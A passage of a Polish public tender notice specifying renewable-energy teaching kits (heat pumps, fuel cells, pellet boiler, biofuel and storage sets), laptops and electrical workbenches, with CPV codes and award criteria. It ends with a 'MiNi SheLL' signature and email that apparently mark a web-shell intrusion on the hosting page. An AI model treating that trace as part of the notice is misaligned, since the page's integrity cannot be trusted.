4. Zestaw dydaktyczny - Kolektor słoneczny - 1 kpl - laboratoryjny służący do demonstracji zasady, właściwości i technicznego wykorzystania przekształcenia energii słonecznej w cieplną. Powinien zawierać wszystkie urządzenia potrzebne do przeprowadzania ćwiczeń/doświadczeń z zakresu absorpcji, przepływu i promieniowania cieplnego oraz do budowy kompletnego kolektora słonecznego z obiegiem termo-syfonowym, pompowym i wymiennikiem ciepła.
Podstawową częścią zestawu powinien być kolektor słoneczny, służący do przekształcania energii promieniowania słonecznego w ciepło, przy zastosowaniu wody jako nośnika energii;
5. Zestaw dydaktyczny - Pompa ciepła - 1 kpl - funkcjonalny model uniwersalnej i odwracalnej pompy ciepła, która może pracować w trybie woda - woda, powietrze - woda, woda - powietrze i powietrze - powietrze. Realizacja wymienionych trybów pracy pompy możliwa powinna być dzięki zastosowaniu przenośnych modułów symulujących dolne i górne źródło ciepła. System ma służyć do demonstracji zasady działania i budowy pompy ciepła. Poprzez zastosowanie zaworu czterodrogowego, system ma zapewnić możliwość odwrócenia obiegu chłodniczego i realizację funkcji chłodziarki. Ze względu na ćwiczenia z zakresu eksploatacji urządzeń i systemów energetyki odnawialnej zestaw ma być tak skonstruowany, aby stan pracy urządzenia można monitorować przy pomocy wskaźnika zaworu czterodrogowego, licznika energii, wskaźników temperatury i manometrów oraz wzierników czynnika ziębniczego;
6. Zestaw dydaktyczny - Pompa ciepła powietrze-woda z klimakonwektorem i zasobnikiem z wężownicą - 1 kpl - rozbudowany laboratoryjny model pompy ciepła powietrze - woda wraz odbiornikami typu klimakonwektor oraz zasobnik z wężownicą, przeznaczony do demonstracji zasady działania i budowy pompy ciepła oraz wykonania wielu ciekawych eksperymentów badających właściwości pompy ciepła.
Zestaw powinien składać się z trzech niezależnych mobilnych modułów:
- moduł pompy ciepła powietrze/woda,
- moduł wymiennika gruntowego (zasobnik wody z wężownicą),
- moduł wymiennika powietrznego (klimakonwektor wentylatorowy).
System powinien być wyposażony w aparaturę pomiarową tj.: pulpit sterowniczy, elektroniczne wskaźniki temperatury, manometry, rozdzielnicę elektryczną z osprzętem, licznik energii elektrycznej oraz w regulator temperatury umożliwiający zmianę parametrów pracy systemu.
Elementy konstrukcyjne powinny być wykonane ze stali nierdzewnej - każdy moduł na odrębnej konstrukcji z kołami jezdnymi z hamulcem;
7. Zestaw dydaktyczny - Kondensacyjny kocioł na pelety z wyposażeniem - 1 kpl - kondensacyjny kocioł na pelet drzewny zasilany w paliwo poprzez automatyczny podajnik ze zintegrowanego zbiornika na pelet. Zestaw wyposażony w domową sieć wody użytkowej oraz sieć grzewczą wysokotemperaturową lub opcjonalnie niskotemperaturową. 
Kocioł wyposażony i oprzyrządowany zgodnie ze specyfikacją zamieszczoną w tabeli wraz z kompletem instrukcji obsługi, dokumentacją techniczną i materiałami dydaktycznymi w języku polskim, zawierającymi opis wykonania co najmniej 3 ćwiczeń/eksperymentów.
Ze względów dydaktycznych zestaw powinien się składać z 4-ch niezależnych modułów, każdy umieszczony na osobnej ramie aluminiowej z kółkami z hamulcem. 
Są to:
- moduł kotła na biomasę,
- moduł buforowego zbiornika na wodę wraz z urządzeniami do rozbioru wody,
- moduł rozbioru wody z zaworem trójdrogowym,
- moduł klimakonwektora.
8. Zestaw dydaktyczny - Ogniwo paliwowe - 1 kpl - przeznaczony do prowadzania zajęć dydaktycznych  i szkoleń z zakresu ogniw paliwowych oraz pozyskiwania energii słonecznej.
Zestaw powinien być wykonany z części składowych systemu w układzie modularnym z czytelnymi wyświetlaczami nadającymi się do wykonywania prezentacji i ćwiczeń/ eksperymentów dla większych grup uczniowskich.
9. Zestaw dydaktyczny - Ogniwo paliwowe (rozbudowany) - 1 kpl - system dydaktyczny umożliwiający demonstrację zasad działania różnych technologii związanych z wytwarzaniem energii elektrycznej przy pomocy ogniw paliwowych.
Zestaw należy wyposażyć w ogniwo słoneczne, elektrolizer i różne rodzaje ogniw paliwowych (ogniwo paliwowe PEM, etanolowe zasilane etanolem oraz ogniwo z tlenkiem stałym - SOFC), celem zbudowania i przeprowadzenia analizy pracy solarno-wodorowego układu generacji energii elektrycznej. System ma umożliwić badanie i analizę pracy poszczególnych jego elementów (m.in. zasada funkcjonowania, charakterystyka i wydajność elektrolizera oraz ogniwa paliwowego), także z możliwością wykorzystania go na zajęciach z fizyki i chemii;
10. Zestaw dydaktyczny - Czysta energia - 1 kpl - profesjonalnie wyposażony zestaw służący do eksperymentowania z energią słoneczną, wiatrową i ogniwami paliwowymi (technologia wodorowa), jednocześnie pozwalający zbudować w warunkach laboratoryjnych autonomiczny system energetyczny zasilany wyłącznie z odnawialnych źródeł energii. 
Ażeby spełnił kryteria innowacyjności i jednocześnie posiadał duże walory dydaktyczne musi być wyposażony w oprogramowanie umożliwiające symulacje różnych wariantów zasilania, obciążenia oraz komputerową obróbkę wyników doświadczeń;
11. Zestaw dydaktyczny - Biopaliwa - 1 kpl - prezentujący proces wytwarzania biopaliwa i możliwości jego zastosowania.
Zestaw powinien umożliwiać dydaktyczne poznanie kompletnego procesu wytwarzania biopaliwa. Początkowa faza przeprowadzanego ćwiczenia służyć ma do zapoznania się z procesem fermentacji alkoholowej substancji biologicznych. Następnie przy pomocy specjalnie do tego celu stworzonej chłodnicy uczeń/słuchacz ma poznać proces destylacji. Ostatnim etapem ćwiczenia powinno być wykorzystanie wytworzonego biopaliwa do produkcji użytecznych form energii - np. poprzez zastosowanie etanolowego ogniwa paliwowego do wytworzenia energii elektrycznej. 
System ma umożliwić nie tylko prezentację procesu wytwarzania bioetanolu, ale także biodiesla poprzez transestryfikację tłuszczów;
12. Zestaw dydaktyczny - Magazynowanie energii - 1 kpl - umożliwiający zapoznanie się różnymi technologiami gromadzenia energii takimi jak: różne rodzaje akumulatorów i ogniwa paliwowe przy pomocy którego mogą być analizowane charakterystyki różnych typów akumulatorów.
Zastosowanie tego zestawu w dydaktyce ma umożliwić uczniom/słuchaczom rozszerzenie wiedzy na temat różnych dziedzin zastosowania akumulatorów oraz właściwości  akumulatorów ołowiowych, NiMH, Lithium-Polymer (LiPo), jak również ogniwa paliwowego PEM;
13. Zestaw - Plansze dydaktyczne z OŹE, format A1 - 1 kpl (26 szt) - obejmujący co najmniej 26 tablic dydaktycznych (w dwóch częściach po 13 sztuk), w formacie A1, ilustrujących zagadnienia z dziedziny odnawialnych źródeł energii - energia słoneczna, energia wiatru, pompy ciepła, energia biomasy;
14. Komputer przenośny - laptop - (8 szt.) - główne parametry: przekątna ekranu 15,6 cala, aplikacje 64 bit, osiągający wynik minimum 2470 punktów w teście PasMark CPU Benchmark, pamięć - minimum 4 GB, dysk twardy - co najmniej 500 GB, grafika zintegrowana.
15. Stół elektrotechniczny z konsolą zasilającą (6 szt.) - stelaż/konstrukcja stołu metalowa malowana proszkowo farbą epoksydową.
Blat laminat HPL z dodatkiem żywicy fenolowej o grubości co najmniej 25 mm z okleiną PCV 2 mm.
Wymiary stołu: 2000x900x750mm (dł. x szer. x wys.).
W poprzek blatu zabudowana konsola/nadstawka wyposażona w:
- wyłącznik różnicowo-prądowy,
- zabezpieczenie przeciążeniowe oraz przeciwzwarciowe,
- 4 gniazda elektryczne 230 V, (PE, N, L1),
- przycisk bezpieczeństwa umieszczony na środku konsoli,
- przyciski załącz/wyłącz,
- panel górny umieszczony w osi symetrii stołu (dwustronny),
- zasilanie sieciowe przewód z wtyczką 1-fazową 16A,
- lampa sygnalizacyjna oznaczająca załączenie urządzenia.
Szczegółowy opis (wszystkich pozycji) przedmiotu zamówienia określa Załącznik Nr 3, dołączony do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.10-9, 44.62.12.20-7, 42.51.11.00-2, 42.51.11.10-5, 44.41.10.00-4, 38.00.00.00-5, 39.18.10.00-4, 30.21.31.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Gwarancja - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com